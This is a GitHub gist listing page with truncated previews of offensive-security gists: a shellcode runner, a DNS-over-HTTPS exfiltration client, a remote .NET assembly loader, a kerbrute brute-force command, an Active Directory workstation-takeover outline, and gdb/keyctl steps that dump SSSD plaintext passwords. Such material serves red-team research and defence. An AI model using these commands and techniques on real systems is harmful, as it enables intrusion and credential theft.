Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code.
whokilleddb
/ JasonToddIsTheBestRobin.c
Created
August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "wininet.lib") | |
| // notepad.exe shellcode | |
| char shellcode[] = { | |
| 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, | |
| 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Info: Stealthy Data Exfiltration Using (DoH) - Client Code | |
| # Date: May 26, 2024 | |
| # Author: Hossam | |
| import os, glob, requests, logging, struct, base64, random, time, httpx | |
| from datetime import datetime | |
| import urllib3 | |
| import win32com.client | |
| from colorama import Fore, Style, init | |
| from cryptography.fernet import Fernet |
0xdevalias
/ _deobfuscating-unminifying-obfuscated-web-app-code.md
Last active
May 9, 2026 07:48
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
zpoint
/ v2ray_wireguard_netflix_spotify_hulu.md
Last active
February 3, 2026 19:35
v2ray + wireguard to unblock gfw and netflix,spotify,hulu
I previously write a gist about how to set up v2ray + openvpn to unblock gfw and netflix
Refers to that gist for more detail.
In short, this a solution to proxy your network to bypass Firewall with stable connections, and also unblock Proxy detection for Netflix/Spotify/etc....
In my use case from China network:
sdcampbell
/ DynamicAssemblyLoader.cs
Last active
February 5, 2023 19:49
Extended Bohop's DynamicAssemblyLoader to work with any .Net assembly loaded from http/s. The original project (https://github.com/bohops/DynamicDotNet/blob/main/assembly_loader/DynamicAssemblyLoader.cs) loaded an assembly from a hard-coded path on disk.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // DynamicAssemblyLoader: A DotNet Assembly Loader using a Dynamic Method and Emitted MSIL Instructions | |
| // Author: @bohops | |
| // | |
| // "Normal" Implementation: | |
| /* | |
| Assembly assembly = Assembly.Load(assemblyBytes); | |
| assembly.EntryPoint.Invoke(obj, objArr); | |
| */ | |
| // Original author is @bohops |
gladiatx0r
/ kerberos_attacks_cheatsheet.md
Created
September 18, 2021 02:04
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
gladiatx0r
/ Workstation-Takeover.md
Last active
August 25, 2025 14:06
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
gladiatx0r
/ gist:c52d529ea268f7e74295c2c492cf9774
Created
October 6, 2020 21:05
— forked from jeffmcjunkin/gist:d5fb8dbf15cbd5d37a77fafccda4d969
Retrieving SSSD plain text passwords (krb5_store_password_if_offline)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for who ever this interest, if you enable krb5_store_password_if_offline in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring | |
| to dump the clear text password you can do : | |
| ``` | |
| gdb -p <PID_OF_SSSD> | |
| call system("keyctl show > /tmp/output") | |
| ``` | |
| From the /tmp/output locate the key_id for the user you want | |
| Example of an output is : |
NewerOlder